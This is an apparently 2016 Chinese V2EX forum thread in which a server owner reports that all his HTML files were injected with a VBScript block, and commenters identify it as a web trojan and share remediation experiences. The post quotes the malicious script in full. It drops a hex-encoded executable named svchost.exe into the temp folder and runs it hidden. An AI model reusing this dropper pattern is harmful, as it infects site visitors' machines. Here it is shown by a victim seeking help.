V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
blakefan
V2EX  ›  服务器

大早上,发现服务器被人攻击了,所有的 html 都被植入了一段 vbscript

  •  
  •   blakefan · 2016-01-12 09:39:57 +08:00 · 5804 次点击
    这是一个创建于 3239 天前的主题,其中的信息可能已经有所发展或是发生改变。

    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A900003000000
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>

    安全不懂啊,懂的 v 友指教一下

    13 条回复    2016-01-29 16:13:57 +08:00
    zhanglp888
        1
    zhanglp888  
       2016-01-12 09:51:31 +08:00
    hicdn
        2
    hicdn  
       2016-01-12 10:30:24 +08:00
    这个是在服务器上看到的还是在浏览器里看到的
    chinafeng
        3
    chinafeng  
       2016-01-12 10:47:55 +08:00
    这是运行一个文件, svchost.exe, 目测是木马
    bigtan
        4
    bigtan  
       2016-01-12 10:54:05 +08:00
    中过这个病毒
    Moker
        5
    Moker  
       2016-01-12 10:59:31 +08:00
    前段时间同事中过,会感染所有的.html 文件后缀,然后重装....不重装好像麻烦点
    hienchu
        6
    hienchu  
       2016-01-12 11:18:17 +08:00 via iPhone
    怎么被入侵的?
    ibcker
        7
    ibcker  
       2016-01-12 12:03:26 +08:00
    等下会不会有人发帖:今天攻击了一个网站,所有的 html 都被植入了一段 vbscript
    am241
        8
    am241  
       2016-01-12 12:08:39 +08:00
    这种病毒十年前就不好用了吧
    billyu
        9
    billyu  
       2016-01-12 12:32:40 +08:00
    我前几天自己电脑也中了 然后用 360 国际版在安全模式下全盘杀毒搞定的 win7
    maskerTUI
        10
    maskerTUI  
       2016-01-12 12:38:03 +08:00
    visonme
        11
    visonme  
       2016-01-12 13:03:00 +08:00
    https://www.abuse.ch/?p=2842

    对你了解这种类别的病毒有帮助
    blakefan
        12
    blakefan  
    OP
       2016-01-12 14:57:02 +08:00
    网页木马程序
    prondtoo
        13
    prondtoo  
       2016-01-29 16:13:57 +08:00
    刚弄好 nexpose ,有需要可以帮你扫一下。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   855 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 21:55 · PVG 05:55 · LAX 13:55 · JFK 16:55
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.